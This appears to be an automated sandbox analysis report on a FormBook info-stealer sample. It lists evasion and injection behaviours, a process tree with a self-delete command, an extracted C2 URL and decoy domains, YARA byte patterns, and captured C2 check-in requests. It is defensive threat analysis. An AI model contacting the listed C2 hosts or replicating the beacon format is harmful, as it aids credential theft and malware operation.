Loading ...

Play interactive tourEdit tour

Windows Analysis Report cK1g5gckZR9VHjj.exe

Overview

General Information

Sample Name:cK1g5gckZR9VHjj.exe
Analysis ID:528618
MD5:5f19b9a3e41ef2e6ec3200bf4a246cec
SHA1:25638b49edf7444005e1e02fb5d972da5920e1d8
SHA256:afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cK1g5gckZR9VHjj.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
    • cK1g5gckZR9VHjj.exe (PID: 1312 cmdline: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
    • cK1g5gckZR9VHjj.exe (PID: 6104 cmdline: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 6900 cmdline: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        2.0.cK1g5gckZR9VHjj.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.0.cK1g5gckZR9VHjj.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: cK1g5gckZR9VHjj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: cK1g5gckZR9VHjj.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 4x nop then pop edi2_2_00415660
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 4x nop then pop esi2_2_004157D8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 4x nop then pop esi2_2_004157AA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi12_2_02DD5660
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi12_2_02DD57D8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi12_2_02DD57AA

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 142.252.22.166 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.94.210.101 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dragonmodz.net
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
          Source: C:\Windows\explorer.exeDomain query: www.qzttb.net
          Source: C:\Windows\explorer.exeDomain query: www.royaldears.com
          Source: C:\Windows\explorer.exeDomain query: www.pittsburghdata.center
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.spoiledzone.com/udeh/
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: PHP/7.0.33X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 14:11:35 GMTConnection: closeContent-Length: 7447Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.381972183.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.396876565.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.qzttb.net
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
